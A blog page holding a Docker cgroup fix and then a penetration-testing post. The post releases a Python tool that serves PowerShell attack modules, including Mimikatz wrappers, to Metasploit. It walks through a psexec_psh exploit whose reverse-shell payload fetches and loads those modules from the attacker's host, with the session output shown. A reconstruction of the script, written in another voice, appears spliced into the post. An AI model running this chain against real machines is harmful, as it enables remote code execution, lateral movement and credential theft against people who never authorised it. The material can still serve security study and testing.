
Debian Jessie w/Docker

In the grand scheme of things, it probably isn't a big deal, but I get annoyed when something isn't running top notch.

I noticed on a clean docker build, when running containers I was getting an error:

WARNING: Your kernel does not support memory swappiness capabilities, memory swappiness discarded.

A bit ominous, no? How could this be? I know my machine has swap, and there's a swap partition mounted. I tossed the error into Google and came back with a few unhelpful forum postings.

Later, I discovered that docker info was outputting similar errors.

WARNING: No swap limit support  
WARNING: No memory limit support  

Just as ominous and unhelpful as the first error. It was back to Google, where I discovered this little gem that posted the fix.

A simple modification to the GRUB_CMDLINE_LINUX_DEFAULT line in /etc/default/grub with the following:

GRUB_CMDLINE_LINUX_DEFAULT="quiet cgroup_enable=memory swapaccount=1"  

Then running sudo update-grub to seal the deal.

Now we have resolution, no more ominous errors when running containers, but what was the root cause?

It turns out that Debian (and some Ubuntu/Mint) distros do not ship with control groups (specifically the memory controller that the kernel parameters above enable) turned on. Control groups give Linux containers the ability to track and expose relevant metrics for memory and other core kernel components. Essentially, control groups allow for the policing of your memory, CPU, and I/O usage. Neat.

You can read more here: https://www.kernel.org/doc/Documentation/cgroups/cgroups.txt

That's all for now.

Beware the JabberWock, my son!

~awh

Interactive Powershell in Metasploit

The fine folks over at Netitude were recently able to get interactive powershell payloads in Metasploit. With the ever growing arsenal of Powershell tools out there, this is huge! Thanks to Ben Turner and David Hardy for their excellent work.

More recently, Larry Spohn over at TrustedSec, wrote up a great post that shows how one could use sed and Apache to make practical use of these new payloads. There is nothing wrong with Larry's method for hosting and loading your PowerShell repository into MSF, but I figured this could all be done in one step. In that spirit, I put together a Python script named "powerserver" to accomplish this.

Running the script is simple, just feed it your PowerShell Module directory path and hosting IP information. The script will move into the directory you specified, walk over it and parse out all of the .ps1 files; it'll then print out a handy list you can copy and paste directly into MSF.

python powerserver.py -p /path/to/powershell_scripts -i [ip_address]:[port]

Example:

awh@jabberwock:~/$ python powerserver.py -p /opt/PowerTools/ -i 192.168.1.102:8080  
[*] Directory found

[*] Copy and paste the below to MSF:

http://192.168.1.102:8080/PowerUp/PowerUp.ps1, http://192.168.1.102:8080/PowerPick/PSInjector/PSInject.ps1, http://192.168.1.102:8080/PowerPick/PSInjector/DLLEnc.ps1, http://192.168.1.102:8080/PowerView/powerview.ps1, http://192.168.1.102:8080/PowerView/functions/Get-NetSessions.ps1, http://192.168.1.102:8080/PowerView/functions/Get-NetShare.ps1, http://192.168.1.102:8080/PowerView/functions/Invoke-ShareFinder.ps1, http://192.168.1.102:8080/PowerView/functions/Get-NetLoggedon.ps1, http://192.168.1.102:8080/PowerView/functions/Invoke-UserHunter.ps1, http://192.168.1.102:8080/PowerView/functions/Invoke-Netview.ps1, http://192.168.1.102:8080/PowerView/functions/Get-Net.ps1, http://192.168.1.102:8080/PowerBreach/PowerBreach.ps1, http://192.168.1.102:8080/PewPewPew/Invoke-MassTokens.ps1, http://192.168.1.102:8080/PewPewPew/Invoke-MassMimikatz.ps1, http://192.168.1.102:8080/PewPewPew/Invoke-MassCommand.ps1, http://192.168.1.102:8080/PewPewPew/Invoke-MassTemplate.ps1, http://192.168.1.102:8080/PewPewPew/Invoke-MassSearch.ps1

[*] Now starting webserver

[*] serving at port 8080
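The heart of that script is a directory walk that turns every .ps1 file into a URL in the format the LOAD_MODULES option expects, then serves the directory. Here is an added Python 3 example of those two steps (my own reconstruction, not the powerserver code from the repository); it assumes the module directory is served from its root so each file's relative path becomes the URL path, and the sample directory tree it builds is constructed for the demonstration.

```python
"""Enumerate .ps1 modules and build the LOAD_MODULES list.

Added example, not the powerserver script itself. Python 3 stand-in for the
SimpleHTTPServer the post uses. Assumes the module root is the web root.
"""
import argparse
import functools
import os
import tempfile
from http.server import HTTPServer, SimpleHTTPRequestHandler


def find_ps1_files(root):
    """Walk root and return '/'-separated paths of .ps1 files relative to root.

    Sorted so the generated list is stable across runs and platforms.
    """
    found = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            if name.lower().endswith(".ps1"):
                rel = os.path.relpath(os.path.join(dirpath, name), root)
                found.append(rel.replace(os.sep, "/"))
    return sorted(found)


def build_load_modules(host_port, rel_paths):
    """Format 'http://host:port/path, http://host:port/path' for 'set LOAD_MODULES'."""
    return ", ".join("http://%s/%s" % (host_port, p) for p in rel_paths)


def make_sample_tree():
    """Constructed sample layout mirroring a few entries from the post's output."""
    root = tempfile.mkdtemp(prefix="ps-modules-")
    for rel in ("PowerUp/PowerUp.ps1",
                "PowerView/powerview.ps1",
                "PowerView/functions/Get-NetShare.ps1",
                "README.md"):  # non-.ps1 file, must be skipped
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("# placeholder\n")
    return root


def serve(root, port):
    """Serve root over HTTP on all interfaces (blocks until interrupted)."""
    handler = functools.partial(SimpleHTTPRequestHandler, directory=root)
    httpd = HTTPServer(("", port), handler)
    print("[*] serving at port %d" % port)
    httpd.serve_forever()


if __name__ == "__main__":
    ap = argparse.ArgumentParser()
    ap.add_argument("-p", "--path", required=True, help="directory of .ps1 modules")
    ap.add_argument("-i", "--ip", required=True, help="host:port to embed in the URLs")
    args = ap.parse_args()
    root = os.path.abspath(args.path)
    if not os.path.isdir(root):
        raise SystemExit("[-] Directory not found: %s" % root)
    print("[*] Directory found\n")
    print("[*] Copy and paste the below to MSF:\n")
    print(build_load_modules(args.ip, find_ps1_files(root)))
    print("\n[*] Now starting webserver")
    serve(root, int(args.ip.rsplit(":", 1)[1]))
```

Run it the same way as the post's script (`python powerserver.py -p /opt/PowerTools/ -i 192.168.1.102:8080`). The list is built with a space after each comma, matching what the post pastes into MSF; the server binds every interface, so restrict it with a host firewall if the lab network is shared.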

With our Python SimpleHTTPServer up and running, we can configure Metasploit. For simplicity, I'm using the "psexec_psh" module in MSF and I'll be using the x64 interactive PowerShell payload.

Set the payload to any of the interactive powershell payloads:

msf exploit(psexec_psh) > show options

...

Payload options (windows/x64/powershell_reverse_tcp):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   EXITFUNC      thread           yes       Exit technique (Accepted: , , seh, thread, process, none)
   LHOST         192.168.1.102    yes       The listen address
   LOAD_MODULES                   no        A list of powershell modules seperated by a comma to download over the web
   LPORT         4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic

You can preload your modules, with the list that the script generated. Simply set the "LOAD_MODULES" option:

msf exploit(psexec_psh) > set LOAD_MODULES http://192.168.1.102:8080/PowerUp/PowerUp.ps1, http://192.168.1.102:8080/PowerPick/PSInjector/PSInject.ps1, http://192.168.1.102:8080/PowerPick/PSInjector/DLLEnc.ps1, http://192.168.1.102:8080/PowerView/powerview.ps1, http://192.168.1.102:8080/PowerView/functions/Get-NetSessions.ps1, http://192.168.1.102:8080/PowerView/functions/Get-NetShare.ps1, http://192.168.1.102:8080/PowerView/functions/Invoke-ShareFinder.ps1, http://192.168.1.102:8080/PowerView/functions/Get-NetLoggedon.ps1, http://192.168.1.102:8080/PowerView/functions/Invoke-UserHunter.ps1, http://192.168.1.102:8080/PowerView/functions/Invoke-Netview.ps1, http://192.168.1.102:8080/PowerView/functions/Get-Net.ps1, http://192.168.1.102:8080/PowerBreach/PowerBreach.ps1, http://192.168.1.102:8080/PewPewPew/Invoke-MassTokens.ps1, http://192.168.1.102:8080/PewPewPew/Invoke-MassMimikatz.ps1, http://192.168.1.102:8080/PewPewPew/Invoke-MassCommand.ps1, http://192.168.1.102:8080/PewPewPew/Invoke-MassTemplate.ps1, http://192.168.1.102:8080/PewPewPew/Invoke-MassSearch.ps1  
LOAD_MODULES => http://192.168.1.102:8080/PowerUp/PowerUp.ps1, http://192.168.1.102:8080/PowerPick/PSInjector/PSInject.ps1, http://192.168.1.102:8080/PowerPick/PSInjector/DLLEnc.ps1, http://192.168.1.102:8080/PowerView/powerview.ps1, http://192.168.1.102:8080/PowerView/functions/Get-NetSessions.ps1, http://192.168.1.102:8080/PowerView/functions/Get-NetShare.ps1, http://192.168.1.102:8080/PowerView/functions/Invoke-ShareFinder.ps1, http://192.168.1.102:8080/PowerView/functions/Get-NetLoggedon.ps1, http://192.168.1.102:8080/PowerView/functions/Invoke-UserHunter.ps1, http://192.168.1.102:8080/PowerView/functions/Invoke-Netview.ps1, http://192.168.1.102:8080/PowerView/functions/Get-Net.ps1, http://192.168.1.102:8080/PowerBreach/PowerBreach.ps1, http://192.168.1.102:8080/PewPewPew/Invoke-MassTokens.ps1, http://192.168.1.102:8080/PewPewPew/Invoke-MassMimikatz.ps1, http://192.168.1.102:8080/PewPewPew/Invoke-MassCommand.ps1, http://192.168.1.102:8080/PewPewPew/Invoke-MassTemplate.ps1, http://192.168.1.102:8080/PewPewPew/Invoke-MassSearch.ps1


msf exploit(psexec_psh) > exploit

[*] Loading 17 modules into the interactive PowerShell session
[*] Started reverse SSL handler on 192.168.1.102:4444 
[*] 192.168.121.128:445 - Executing the payload...
[+] 192.168.121.128:445 - Service start timed out, OK if running a command or non-service executable...
[*] Powershell session session 3 opened (192.168.1.102:4444 -> 192.168.1.102:35899) at 2015-07-21 11:36:59 -0600

Windows PowerShell running as user BOB$ on TESTBOX1  
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

[+] Loading modules.

PS C:\Windows\system32>  

Awesome, and with our shell we should be able to see one of the PowerTools scripts:

PS C:\Windows\system32>get-help get-serviceperms

NAME  
    Get-ServicePerms

SYNOPSIS  
    Returns a list of services that the user can modify.


SYNTAX  
    Get-ServicePerms [<CommonParameters>]


DESCRIPTION  
    This function enumerates all available services and tries to
    open the service for modification, returning the service object
    if the process doesn't failed.


RELATED LINKS

REMARKS  
    To see the examples, type: "get-help Get-ServicePerms -examples".
    For more information, type: "get-help Get-ServicePerms -detailed".
    For technical information, type: "get-help Get-ServicePerms -full".



PS C:\Windows\system32>  

Installing is easy, peasy, lime and squeezy:

git clone https://github.com/awhitehatter/powerserver.git

Beware the JabberWock, my son!

~awh